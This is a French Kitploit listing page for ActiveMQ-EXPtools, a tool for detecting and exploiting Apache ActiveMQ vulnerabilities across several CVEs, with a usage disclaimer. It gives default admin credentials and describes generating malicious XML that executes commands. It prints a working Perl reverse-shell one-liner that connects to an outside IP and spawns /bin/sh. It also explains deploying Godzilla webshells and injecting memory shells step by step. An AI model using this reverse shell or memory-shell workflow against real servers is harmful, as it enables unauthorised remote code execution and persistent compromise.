Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ActiveMQ-EXPtools — Outil d'exploitation complet des vulnérabilités Apache ActiveMQ (CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197,CVE-2026-40466, CVE-2026-42588) | Kitploit
Outils/GitHubGitHub/catherines77/activemq-exptools
Analyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubcatherines77/activemq-exptools

ActiveMQ-EXPtools

Outil d'exploitation complet des vulnérabilités Apache ActiveMQ (CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197,CVE-2026-40466, CVE-2026-42588)

Voir le dépôt
8391il y a 2 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ActiveMQ-EXPtools

Prend en charge la détection et l'exploitation des vulnérabilités Apache ActiveMQ : CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588

image-20260420111234916

[!WARNING] Cet outil est destiné uniquement à la recherche en sécurité et à des fins d'apprentissage. L'utilisateur assume seul toutes les responsabilités légales et connexes découlant de l'utilisation de cet outil. Assurez-vous que votre utilisation est conforme aux lois et réglementations locales. L'auteur décline toute responsabilité. Si vous n'acceptez pas ces conditions, n'utilisez pas cet outil.

Lancement avec jdk8, port Openwire par défaut 61616, parfois l'environnement cible peut ne pas l'ouvrir. Nom d'utilisateur et mot de passe par défaut d'Apache ActiveMQ : admin:admin. Le panneau de configuration BeanXML permet de générer un fichier XML malveillant exécutant les commandes correspondantes. N'hésitez pas à soumettre une Issue en cas de problème.

Lors de la détection des vulnérabilités, l'adresse du serveur XML malveillant peut être définie sur dnslog. Si une requête est reçue, cela peut indiquer la présence de CVE-2023-46604, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588.

Remarques sur l'exploitation de certaines vulnérabilités

CVE-2015-5254

java-chains génère des données de désérialisation. Pour valider la vulnérabilité, utilisez URLDNS.

Pour un reverse shell, il est préférable d'utiliser perl, car sh et bash peuvent parfois ne pas fonctionner.

root@kitploit:~
/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

image-20260420110252750

CVE-2022-41678

Lors de l'écriture d'un webshell personnalisé, l'écriture du shell de glace (BingXie) génère une erreur 500, alors que Godzilla fonctionne normalement. Lors de la connexion avec l'outil, veillez à ajouter l'en-tête d'authentification.

Injection de mémoire-shell (Memory Shell)

À partir de la version 1.4, le module de génération de mémoire-shell MemShellParty n'est plus intégré, d'une part car le fatjar est trop volumineux, d'autre part car la méthode de décodage base64 nécessaire au SpringBeanXmlClassLoader n'est pas universelle selon les versions de Java, ce qui oblige l'outil à réinventer la roue. Les développeurs ayant besoin d'une mémoire-shell peuvent se référer au processus de génération XML ci-dessous :

Générez d'abord la chaîne base64 de la mémoire-shell correspondante dans MemShellParty : https://party.mem.mk/ui

image-20260508110638599

Ensuite, allez dans java-chains, sélectionnez Generate-OtherPayload, puis choisissez Bytecode personnalisé.

0

Sélectionnez la méthode de décodage base64 en fonction de la version de JDK. La méthode par défaut est decodeFromString, mais pour l'environnement cible CVE-2026-34197 de vulhub, il faut choisir java.util.Base64.

Enfin, remplissez la chaîne Base64 de la mémoire-shell et cliquez sur Générer.

image-20260508110858921

Pour les types Filter, Listener ou Servlet, il faut ajouter le chemin /admin/, /api/ ainsi que l'en-tête d'authentification lors de la connexion à l'adresse de la mémoire-shell. Pour le handler, le chemin et le champ d'authentification ne sont pas nécessaires.

Remerciements

https://github.com/URJACK2025/CVE-2022-41678

https://github.com/vulhub/vulhub

https://github.com/ReaJason/MemShellParty

https://github.com/1diot9/MyJavaSecStudy/blob/5504868a7cba4bf674fe6974fe8f613e556e5d42/Apache/ActiveMQ/CVE-2026-40466/poc/CVE-2026-40466_HTTP_Discovery_RCE_Analysis.md

https://github.com/vulhub/java-chains

Télécharger l’outil